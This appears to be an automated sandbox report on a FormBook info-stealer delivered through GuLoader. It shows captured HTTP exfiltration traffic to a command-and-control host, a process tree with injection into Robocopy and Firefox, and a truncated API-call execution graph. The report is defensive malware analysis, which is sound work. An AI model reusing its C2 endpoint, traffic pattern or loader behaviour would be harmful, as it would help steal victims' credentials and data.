                                                                                  Data Ascii: AvLLLbOh=BnjbCdG17bAwEw/KhWkI4+TJHDI7oUZjqmmyVWxMc18IFjNSOwym8FTKq/SUmRJZ7//XfH6bcgANOe/xpym5FHdPI5OzS+lhuYp/uRxs3aQbvg0Jy5z0hZWXCLcuOwNzZUfEjLLZXvs0Qm41Kji9bTZzO+8F+95qdBHMH90MKE8Gr6qpCoEbiAbBzyMWf+uS5rokDK6NbYB7ur4tSiT0Cardo/589Adu+LXbFAEG8FtMHrInA7hNANIWCrsxDe1bzg6ZOnteKL44ZYWTVasMaV2Jqthw8hKwasjUMv/wYA2+3GNOGwqI0QLjhBCR6UCCl48jwNOTFL7Os876j9EkMJN0ywqBWD1cQji04UdcZ1/swrNnH3QGkmtaRfUOwuqkx7mSo7EmbOreExkf572NEQYoam+5KDpIu2Pk8fJegB38GNBboZa62YxhSw17Oh2BmSTozmwiSgHF80hz2p4XZgkF3cDA3HRHBhRFGbMHZoafXCzo6P5GPLDGbC+hcpvyT5fx213oiDXtYqAf13cyw0c=
                                                                                  Aug 27, 2024 17:51:31.627439976 CEST225INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.14.1
                                                                                  Date: Tue, 27 Aug 2024 15:51:31 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  X-Rate-Limit-Limit: 5s
                                                                                  X-Rate-Limit-Remaining: 18
                                                                                  X-Rate-Limit-Reset: 2024-08-27T15:51:33.7673406Z


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  72192.168.11.204987885.159.66.9380
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:51:34.154535055 CEST2578OUTPOST /fu44/ HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tmglift.xyz
                                                                                  Origin: http://www.tmglift.xyz
                                                                                  Referer: http://www.tmglift.xyz/fu44/
                                                                                  Content-Length: 52933
                                                                                  Cache-Control: no-cache
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 41 76 4c 4c 4c 62 4f 68 3d 42 6e 6a 62 43 64 47 31 37 62 41 77 45 77 2f 4b 68 57 6b 49 34 2b 54 4a 48 44 49 37 6f 55 5a 6a 71 6d 6d 79 56 57 78 4d 63 31 30 49 46 78 31 53 4f 54 61 6d 2f 46 54 4b 32 76 53 56 6d 52 4a 2b 37 2f 58 74 66 48 33 75 63 6a 34 4e 4e 50 76 78 70 68 4f 35 50 6e 64 4b 43 5a 4f 39 59 65 6b 36 75 59 6b 6b 75 52 6b 5a 77 70 4d 62 75 6a 73 4a 77 36 62 33 38 35 57 52 43 4c 63 69 45 51 4e 52 5a 55 61 4a 6a 4c 50 5a 58 71 30 30 52 56 41 31 5a 44 65 39 41 54 5a 77 56 4f 38 41 33 64 35 6c 64 41 69 6f 48 39 30 63 4b 47 51 47 72 39 65 70 44 72 63 59 69 67 62 42 74 69 4d 5a 4f 75 53 65 35 76 42 78 44 4b 2b 4e 62 62 42 37 75 4c 34 74 58 44 54 7a 47 36 72 54 2b 50 35 72 71 51 51 74 2b 4b 79 6f 46 43 49 47 38 78 46 4d 42 63 6f 6e 4d 35 5a 4e 4e 4e 49 59 4d 4c 73 69 4a 2b 31 66 7a 67 72 34 4f 6d 4e 6f 4b 4d 67 34 61 36 65 54 65 59 49 4c 54 56 32 4c 32 64 68 66 34 68 4f 30 61 74 4f 57 4d 76 2b 31 59 42 79 2b 33 32 39 4f 46 30 47 58 35 67 4c 6b 74 68 43 49 77 30 4f 49 6c 34 67 72 77 4f 65 36 46 [TRUNCATED]
                                                                                  Data Ascii: AvLLLbOh=BnjbCdG17bAwEw/KhWkI4+TJHDI7oUZjqmmyVWxMc10IFx1SOTam/FTK2vSVmRJ+7/XtfH3ucj4NNPvxphO5PndKCZO9Yek6uYkkuRkZwpMbujsJw6b385WRCLciEQNRZUaJjLPZXq00RVA1ZDe9ATZwVO8A3d5ldAioH90cKGQGr9epDrcYigbBtiMZOuSe5vBxDK+NbbB7uL4tXDTzG6rT+P5rqQQt+KyoFCIG8xFMBconM5ZNNNIYMLsiJ+1fzgr4OmNoKMg4a6eTeYILTV2L2dhf4hO0atOWMv+1YBy+329OF0GX5gLkthCIw0OIl4grwOe6FMjOj876ncEnVJNztgqMIz0EQjfd4XRMZkjsz7dnDnQHiGtea/UIh+qkx7qGo7ImbbfeEGYf8oONIwYqam+kKDk2u2G38eY7gCb8GYlbvby9j4x4Ww1SKh7emR3gziRfTTzF9w9zyp4YcAkGwcDszHMYBhNzGb4XZrafBjW3r94YLJ/SSjq4VPnYcaHK63nFvG/0SMc3kGEpkSe7wdq+qxtDz0rrEV+jcucFa96B/dRISh5CDSNCDB/hjPnoMjZVO/THNNpkliBfWVFdVpvH/So/vniivbup1l3Xv2jomxvOTEGHsQTb/qJhXZFybXEVbxBpqAKu7beGA9YGpFVPrDs1+ciJVp7cBjlOGAtQTm8vHvZeMzYc2N3oPv6OSvxZ6yKc2RzgkcTjFBKQMYQHCquiONjCQNzB2txHFGP6d4FIbHMPNSBzQw5ToRk5ACioH6FYNOHqgYC38DOtXbPKMQS7cHGnHMgKl9nxhjaGzlxuaIRVwIjtoWGkO3TV8nG/+yLhZ+5yqm8KzPEJxUxXksRmFEmg7DvREAZ/me/q5O6fodBCDQMAfu6LQDGgGtXxfOO3yHXk1i75y/EIpJqteHSlxCTJKEmUIUKv8+wUwht+z/iQ7eFSjkwOrmK2abl6cuHil8amopBZdCQfqWTN6TsWhixGPHlub1d [TRUNCATED]
                                                                                  Aug 27, 2024 17:51:34.154570103 CEST2578OUTData Raw: 4a 44 38 6e 2f 61 41 6f 6a 38 45 34 74 45 6f 68 39 6a 4d 4d 75 58 32 59 6d 50 36 31 32 6f 4f 58 76 37 78 54 2f 62 36 62 79 69 61 76 6e 4a 5a 71 5a 44 55 6c 70 76 55 38 56 44 4f 30 49 42 50 56 75 61 4a 45 66 52 46 36 4e 69 30 30 73 6a 53 77 69 57
                                                                                  Data Ascii: JD8n/aAoj8E4tEoh9jMMuX2YmP612oOXv7xT/b6byiavnJZqZDUlpvU8VDO0IBPVuaJEfRF6Ni00sjSwiWOW2HL+SKPmgE2yL15yeidSq9ToYJSDf1kyskNhT+mlpXmilLn+menGCgeip9mD1AC2U7PdnGIkwrOPcXkM9jXs5WrnDhbOJoVZsIvxmQLUnaZvtJD3dw4uMuCkGcWkvtnOw8+x1463goCTzPi/QATlGmtk0lZB1ZX
                                                                                  Aug 27, 2024 17:51:34.154643059 CEST7734OUTData Raw: 78 56 4c 73 39 51 45 42 53 69 6c 62 48 4e 43 51 4a 50 47 35 71 6f 72 61 4f 71 6b 41 59 4b 77 58 63 66 51 7a 6d 2b 4d 58 2b 54 76 6e 49 35 6c 6a 68 48 63 75 6c 4e 64 4f 55 46 63 67 53 58 34 79 47 4e 56 64 68 69 73 63 31 31 6d 32 54 73 5a 55 54 54
                                                                                  Data Ascii: xVLs9QEBSilbHNCQJPG5qoraOqkAYKwXcfQzm+MX+TvnI5ljhHculNdOUFcgSX4yGNVdhisc11m2TsZUTTn973zdaD/sV7yby5J6P/NUcWVvEBp2bJ4VL70fj/nxM7yRARZcygkwm7lXARUlr4f5aadJlvjZYr2fiF5l02sBSlAT4STleOuDmQ8otCHARs74fMb54TJPkV2xGVm8X2rETu8dZpoBdtd4x5GymfwqcETm/gpPVov
                                                                                  Aug 27, 2024 17:51:34.376523018 CEST2578OUTData Raw: 79 49 44 2b 76 55 61 38 62 6c 4f 6a 31 67 39 4c 5a 45 53 41 72 67 63 43 6d 48 76 39 6c 48 41 47 6a 55 4e 74 5a 6f 79 62 4c 66 4e 30 68 48 52 73 35 39 71 33 56 34 54 50 76 6b 38 41 42 2b 4d 79 76 61 56 4e 57 69 34 59 71 76 66 35 78 78 77 39 78 6a
                                                                                  Data Ascii: yID+vUa8blOj1g9LZESArgcCmHv9lHAGjUNtZoybLfN0hHRs59q3V4TPvk8AB+MyvaVNWi4Yqvf5xxw9xjKVtjhz9FniOuio7i6oHbI9srOkcKbL05zy+t6EkQnF2osqakDueIwFh5RjXLkOBTbAJPN6tlu9dmXuT3hFIYgJWLlEBeJ5P85BYWsHUL9T3z8mxLB4nZe7hXODeBt4ia/Ap3GdwS96pHOSPQ2zagEYfF8iPqavISL
                                                                                  Aug 27, 2024 17:51:34.376602888 CEST2578OUTData Raw: 61 64 68 36 48 71 78 72 74 6f 32 62 78 50 4f 62 76 41 50 7a 4a 64 55 49 32 69 48 54 42 54 2f 4f 66 4d 4f 61 34 4f 45 66 68 76 2f 54 31 51 75 71 34 59 41 48 46 51 2f 6f 79 72 4d 5a 37 32 6f 31 62 31 70 42 41 70 51 4a 72 36 43 6a 34 39 71 6f 68 59
                                                                                  Data Ascii: adh6Hqxrto2bxPObvAPzJdUI2iHTBT/OfMOa4OEfhv/T1Quq4YAHFQ/oyrMZ72o1b1pBApQJr6Cj49qohY8z9JFbMF4f7NIIUoWLrEZfkpoW62pGznKdJUHaCuDCzJd5IZy9LJ7DngoP2cKWrAL/vLzwwg4XjqESzPoDhYatWk7PffCQFtwhHJ7qZAVsjAlJXj1XCQmDVovzezYpo7LHcy3rI81wWYUGWkYbrvX9TQfZasLV9Xj
                                                                                  Aug 27, 2024 17:51:34.376667976 CEST1289OUTData Raw: 55 57 6a 61 31 62 6a 75 42 4f 41 4e 65 6a 71 59 4d 71 6a 4d 38 2f 33 63 74 54 66 4d 6e 47 32 47 66 67 73 52 56 4c 6f 6a 5a 6b 51 57 74 47 77 70 6f 59 46 31 4b 31 73 7a 6a 46 51 31 67 49 44 72 68 47 7a 78 6a 36 34 68 2f 71 53 67 65 58 4f 30 57 46
                                                                                  Data Ascii: UWja1bjuBOANejqYMqjM8/3ctTfMnG2GfgsRVLojZkQWtGwpoYF1K1szjFQ1gIDrhGzxj64h/qSgeXO0WFxva4k8erOXVncpXy0EiThBxb5q8JqFOG9OtiGsk5v5llWDg/SWjWBTtveQhbf22mHRrwFK0NgVK6XGmtjf8C4xXeifPcfLyMCGWSkVnzM/+kHK6poUAHnK859LpTvA9206OFrGqaddajFwn4IWm44/BA6dW6DzQ9c
                                                                                  Aug 27, 2024 17:51:34.376808882 CEST6445OUTData Raw: 35 50 73 4f 67 38 64 50 59 43 57 6d 67 76 67 62 36 78 35 58 71 63 31 55 42 44 63 6b 47 64 59 56 50 32 51 68 4e 33 57 65 46 6d 34 61 36 62 62 6f 38 38 58 63 58 2f 71 2b 66 38 39 69 43 6f 31 6e 42 56 4e 2b 75 32 6e 44 72 79 62 7a 63 64 36 71 55 72
                                                                                  Data Ascii: 5PsOg8dPYCWmgvgb6x5Xqc1UBDckGdYVP2QhN3WeFm4a6bbo88XcX/q+f89iCo1nBVN+u2nDrybzcd6qUr+YumYt0zuBuius3xA4WwzLT8G0xoaiG6fQn3l3DDlOlWIv8V2jbDMKY/qItJWRarCpz86H54CllpHwHM1edYy1e7U1OGeoed1w8Fi7KA8oB5luW4Gj+a/8jVcni9WQGs62Z2q22PnwAwhNaSmO77w+9M+x5dX3tI0
                                                                                  Aug 27, 2024 17:51:34.376976013 CEST5156OUTData Raw: 72 2f 37 4c 47 37 56 43 71 70 6d 6a 76 46 43 59 2f 37 34 72 48 54 41 6c 54 6c 7a 63 44 6c 70 37 74 6b 61 58 6b 67 6c 51 58 47 32 61 56 6d 6f 71 62 62 34 6d 55 66 7a 42 2b 33 36 46 64 45 62 6a 4f 59 30 34 53 59 73 37 62 68 7a 70 4b 38 36 48 64 4c
                                                                                  Data Ascii: r/7LG7VCqpmjvFCY/74rHTAlTlzcDlp7tkaXkglQXG2aVmoqbb4mUfzB+36FdEbjOY04SYs7bhzpK86HdLyQJDQchyv+chhWKU4mOy4w1/U1UxKXtqL+jLXXY85iFtKPtSugfvPALxiiMtvQhl7YQjsuApjdT4poQf4IStiLTFzPSf8YYZdgM4AImuyUZZk7+/lUT8FRMPhPwKocki0q5X94OaXEtUSiu6h3DjkaoSx5ivSuhr2
                                                                                  Aug 27, 2024 17:51:34.377126932 CEST5156OUTData Raw: 55 36 50 78 48 4e 79 33 53 59 64 51 70 5a 78 2b 76 49 49 77 2b 67 6f 4b 51 46 46 48 43 42 77 69 33 6c 53 37 53 76 38 6d 4d 4e 2b 68 62 58 7a 75 4a 36 6b 5a 70 4b 30 4f 79 6f 4f 31 7a 33 54 52 79 4a 39 79 68 66 39 79 76 74 34 39 4d 53 6f 48 7a 50
                                                                                  Data Ascii: U6PxHNy3SYdQpZx+vIIw+goKQFFHCBwi3lS7Sv8mMN+hbXzuJ6kZpK0OyoO1z3TRyJ9yhf9yvt49MSoHzPTZADUS5cL4LH3SGGnBkcxovXsO3RuItcXqbjVrAzzIv7B7wa6DwnBX4uJFnc9w362V0W7ysqXa38Yw1k44maZA+RqmZ5lrP8w9dhz6Z1CgHQPUCZmCcwyU0l3KJRhofyr6nfciLtFKlCh5OAwUZ+rqH9pF3X4ZJ+q
                                                                                  Aug 27, 2024 17:51:34.377317905 CEST2578OUTData Raw: 6a 42 48 2b 43 49 74 32 57 42 32 43 47 43 62 4b 71 69 4a 38 7a 41 6f 36 68 30 71 41 67 31 6e 75 72 2f 48 34 52 63 77 61 69 61 4b 48 45 42 57 6d 4b 2b 5a 73 72 6c 30 6f 36 53 44 4e 79 59 39 7a 50 66 2b 74 68 67 61 4c 6b 59 69 79 46 34 4c 30 76 30
                                                                                  Data Ascii: jBH+CIt2WB2CGCbKqiJ8zAo6h0qAg1nur/H4RcwaiaKHEBWmK+Zsrl0o6SDNyY9zPf+thgaLkYiyF4L0v0s4Dr1XkNnK5H4gmlX0jcKrqVk2sLLhJIPhuXhWoS1YgLW1MWFXepA52vhnO9A1HNE/bHX68HnZl+UG4TiRnDPr3wyAM4zVo/giyF+cqPn8ohFWO+0c06oE9juIhtZQ6VwnInwdxgYISC8So5i8L3R2bkBXqtB2aGM
                                                                                  Aug 27, 2024 17:51:34.598386049 CEST2578OUTData Raw: 4c 45 45 72 78 51 65 71 72 63 57 5a 58 6f 6e 66 30 54 50 34 2f 52 49 58 37 52 44 4e 74 57 66 61 71 52 50 37 33 48 41 61 44 62 35 7a 54 47 31 37 6f 43 48 2f 70 34 43 33 34 34 32 41 6b 68 6e 37 2f 47 62 63 2f 53 76 78 62 4b 72 6f 58 61 5a 32 6a 72
                                                                                  Data Ascii: LEErxQeqrcWZXonf0TP4/RIX7RDNtWfaqRP73HAaDb5zTG17oCH/p4C3442Akhn7/Gbc/SvxbKroXaZ2jroKhNP8coeByL10do5DY6CgYpIDcvqfzn32f2s3lVDswMN33BYTN6Hc4aACh7cu1WWbr/PVsHICh0V3o4OGscz/W53EPLCRaKVxKvtVST9UhBDFfD2+W8SaqxFdcQ6tMqwo6bNW2bkHA9Kij8TgLq0xKtj5zqJSs7N
                                                                                  Aug 27, 2024 17:51:34.822670937 CEST225INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.14.1
                                                                                  Date: Tue, 27 Aug 2024 15:51:34 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  X-Rate-Limit-Limit: 5s
                                                                                  X-Rate-Limit-Remaining: 19
                                                                                  X-Rate-Limit-Reset: 2024-08-27T15:51:39.7128638Z


                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                  73192.168.11.204987985.159.66.9380
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Aug 27, 2024 17:51:36.916383982 CEST524OUTGET /fu44/?AvLLLbOh=MlL7Bon/74QoG2vpxD8T9dipagYbr0R/tXGKYkMRJkwHHENkeAO2oHPD98qp5zZW/5TdXnrAZisENNCTsRHdM0U4DZ3reu4ViZt4mxUl7os1vic25L7j48U=&7RB=66nPyLG8 HTTP/1.1
                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                  Accept-Language: en-US
                                                                                  Host: www.tmglift.xyz
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Aug 27, 2024 17:51:37.140204906 CEST225INHTTP/1.1 404 Not Found
                                                                                  Server: nginx/1.14.1
                                                                                  Date: Tue, 27 Aug 2024 15:51:37 GMT
                                                                                  Content-Length: 0
                                                                                  Connection: close
                                                                                  X-Rate-Limit-Limit: 5s
                                                                                  X-Rate-Limit-Remaining: 19
                                                                                  X-Rate-Limit-Reset: 2024-08-27T15:51:42.0304318Z


                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Click to jump to process

                                                                                  Target ID:0
                                                                                  Start time:11:44:25
                                                                                  Start date:27/08/2024
                                                                                  Path:C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:742'766 bytes
                                                                                  MD5 hash:3E9713868F8C85AC3AEA7FA6C1AE4387
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.6646879264.00000000068C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:3
                                                                                  Start time:11:45:41
                                                                                  Start date:27/08/2024
                                                                                  Path:C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\IMG_00991ORDER_FILES.exe"
                                                                                  Imagebase:0x400000
                                                                                  File size:742'766 bytes
                                                                                  MD5 hash:3E9713868F8C85AC3AEA7FA6C1AE4387
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.6863945298.0000000034E90000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.6864836258.00000000354F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low
                                                                                  Has exited:true

                                                                                  Target ID:4
                                                                                  Start time:11:46:03
                                                                                  Start date:27/08/2024
                                                                                  Path:C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe"
                                                                                  Imagebase:0x5d0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.10861889744.0000000002410000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:5
                                                                                  Start time:11:46:05
                                                                                  Start date:27/08/2024
                                                                                  Path:C:\Windows\SysWOW64\Robocopy.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Windows\SysWOW64\Robocopy.exe"
                                                                                  Imagebase:0x580000
                                                                                  File size:142'336 bytes
                                                                                  MD5 hash:6B2AE9D48535CE68D53D56E65248BB4C
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.10261487014.0000000004820000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.10261406795.00000000047D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                  Reputation:low
                                                                                  Has exited:false

                                                                                  Target ID:6
                                                                                  Start time:11:46:18
                                                                                  Start date:27/08/2024
                                                                                  Path:C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Program Files (x86)\tFYJqzjRYyXbCWlWPAGPGyVKgmdJiFqmUUgUUdHErnBsUldOAekJyEmWAoONgAelqMxL\DRCZnsuCMood.exe"
                                                                                  Imagebase:0x5d0000
                                                                                  File size:140'800 bytes
                                                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.10861332855.0000000000A90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                  Reputation:high
                                                                                  Has exited:false

                                                                                  Target ID:7
                                                                                  Start time:11:46:36
                                                                                  Start date:27/08/2024
                                                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                  Imagebase:0x7ff6d7550000
                                                                                  File size:597'432 bytes
                                                                                  MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                  Has elevated privileges:false
                                                                                  Has administrator privileges:false
                                                                                  Programmed in:C, C++ or other language
                                                                                  Reputation:moderate
                                                                                  Has exited:true

                                                                                  Reset < >

                                                                                    Execution Graph

                                                                                    Execution Coverage:28.4%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:19.2%
                                                                                    Total number of Nodes:709
                                                                                    Total number of Limit Nodes:21
                                                                                    execution_graph 3058 6f8a23e9 3059 6f8a2453 3058->3059 3060 6f8a245e GlobalAlloc 3059->3060 3061 6f8a247d 3059->3061 3060->3059 3068 6f8a170d 3069 6f8a15b6 GlobalFree 3068->3069 3071 6f8a1725 3069->3071 3070 6f8a176b GlobalFree 3071->3070 3072 6f8a1740 3071->3072 3073 6f8a1757 VirtualFree 3071->3073 3072->3070 3073->3070 3089 6f8a2d43 3090 6f8a2d5b 3089->3090 3091 6f8a162f 2 API calls 3090->3091 3092 6f8a2d76 3091->3092 3093 6f8a1000 3094 6f8a101b 5 API calls 3093->3094 3095 6f8a1019 3094->3095 3096 6f8a10e1 3097 6f8a1111 3096->3097 3098 6f8a12b0 GlobalFree 3097->3098 3099 6f8a11d7 GlobalAlloc 3097->3099 3100 6f8a1240 GlobalFree 3097->3100 3101 6f8a135a 2 API calls 3097->3101 3102 6f8a12ab 3097->3102 3103 6f8a1312 2 API calls 3097->3103 3104 6f8a129a GlobalFree 3097->3104 3105 6f8a1381 lstrcpyW 3097->3105 3106 6f8a116b GlobalAlloc 3097->3106 3099->3097 3100->3097 3101->3097 3102->3098 3103->3097 3104->3097 3105->3097 3106->3097 2639 40352f SetErrorMode GetVersionExW 2640 403583 GetVersionExW 2639->2640 2641 4035bb 2639->2641 2640->2641 2642 403612 2641->2642 2643 406948 5 API calls 2641->2643 2644 4068d8 3 API calls 2642->2644 2643->2642 2645 403628 lstrlenA 2644->2645 2645->2642 2646 403638 2645->2646 2647 406948 5 API calls 2646->2647 2648 40363f 2647->2648 2649 406948 5 API calls 2648->2649 2650 403646 2649->2650 2651 406948 5 API calls 2650->2651 2652 403652 #17 OleInitialize SHGetFileInfoW 2651->2652 2728 406554 lstrcpynW 2652->2728 2655 4036a1 GetCommandLineW 2729 406554 lstrcpynW 2655->2729 2657 4036b3 2658 405e50 CharNextW 2657->2658 2659 4036d9 CharNextW 2658->2659 2665 4036eb 2659->2665 2660 4037ed 2661 403801 GetTempPathW 2660->2661 2730 4034fe 2661->2730 2663 403819 2666 403873 DeleteFileW 2663->2666 2667 40381d GetWindowsDirectoryW lstrcatW 2663->2667 2664 405e50 CharNextW 2664->2665 2665->2660 2665->2664 2673 4037ef 2665->2673 2740 4030a2 GetTickCount GetModuleFileNameW 2666->2740 2669 4034fe 12 API calls 2667->2669 2670 403839 2669->2670 2670->2666 2672 40383d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 2670->2672 2671 403887 2679 405e50 CharNextW 2671->2679 2710 40392e 2671->2710 2720 40393e 2671->2720 2674 4034fe 12 API calls 2672->2674 2838 406554 lstrcpynW 2673->2838 2677 40386b 2674->2677 2677->2666 2677->2720 2684 4038a6 2679->2684 2681 403ab0 2685 403b34 ExitProcess 2681->2685 2686 403ab8 GetCurrentProcess OpenProcessToken 2681->2686 2682 403a8c 2908 405bb4 2682->2908 2687 403904 2684->2687 2688 403947 2684->2688 2691 403ad0 LookupPrivilegeValueW AdjustTokenPrivileges 2686->2691 2692 403b04 2686->2692 2839 405f2b 2687->2839 2824 405b1f 2688->2824 2691->2692 2695 406948 5 API calls 2692->2695 2698 403b0b 2695->2698 2697 403b20 ExitWindowsEx 2697->2685 2702 403b2d 2697->2702 2698->2697 2698->2702 2701 403966 2704 40397e 2701->2704 2855 406554 lstrcpynW 2701->2855 2705 40140b 2 API calls 2702->2705 2709 4039a4 wsprintfW 2704->2709 2704->2720 2723 406314 40 API calls 2704->2723 2724 406591 21 API calls 2704->2724 2726 403aa2 CloseHandle 2704->2726 2835 405b37 CreateProcessW 2704->2835 2898 4068b1 FindFirstFileW 2704->2898 2705->2685 2706 403923 2854 406554 lstrcpynW 2706->2854 2711 406591 21 API calls 2709->2711 2768 403c26 2710->2768 2714 4039c8 2711->2714 2715 4039e0 GetFileAttributesW 2714->2715 2716 403a1a SetCurrentDirectoryW 2714->2716 2828 405aa8 CreateDirectoryW 2714->2828 2856 405b02 CreateDirectoryW 2714->2856 2718 4039f7 2715->2718 2719 4039ec DeleteFileW 2715->2719 2831 406314 MoveFileExW 2716->2831 2718->2704 2718->2709 2718->2720 2859 405c60 2718->2859 2719->2718 2901 403b4c 2720->2901 2723->2704 2724->2704 2726->2720 2728->2655 2729->2657 2731 406802 5 API calls 2730->2731 2733 40350a 2731->2733 2732 403514 2732->2663 2733->2732 2912 405e23 lstrlenW CharPrevW 2733->2912 2736 405b02 2 API calls 2737 403522 2736->2737 2915 406073 2737->2915 2919 406044 GetFileAttributesW CreateFileW 2740->2919 2742 4030e2 2761 4030f2 2742->2761 2920 406554 lstrcpynW 2742->2920 2744 403108 2921 405e6f lstrlenW 2744->2921 2748 403119 GetFileSize 2749 403130 2748->2749 2750 403213 2748->2750 2749->2750 2756 40327f 2749->2756 2749->2761 2765 40303e 6 API calls 2749->2765 2958 4034d1 2749->2958 2926 40303e 2750->2926 2752 40321c 2754 40324c GlobalAlloc 2752->2754 2752->2761 2961 4034e7 SetFilePointer 2752->2961 2937 4034e7 SetFilePointer 2754->2937 2758 40303e 6 API calls 2756->2758 2758->2761 2759 403235 2762 4034d1 ReadFile 2759->2762 2760 403267 2938 4032d9 2760->2938 2761->2671 2764 403240 2762->2764 2764->2754 2764->2761 2765->2749 2766 403273 2766->2761 2766->2766 2767 4032b0 SetFilePointer 2766->2767 2767->2761 2769 406948 5 API calls 2768->2769 2770 403c3a 2769->2770 2771 403c40 2770->2771 2772 403c52 2770->2772 2990 40649b wsprintfW 2771->2990 2773 406422 3 API calls 2772->2773 2774 403c82 2773->2774 2775 403ca1 lstrcatW 2774->2775 2777 406422 3 API calls 2774->2777 2778 403c50 2775->2778 2777->2775 2982 403efc 2778->2982 2781 405f2b 18 API calls 2782 403cd3 2781->2782 2783 403d67 2782->2783 2785 406422 3 API calls 2782->2785 2784 405f2b 18 API 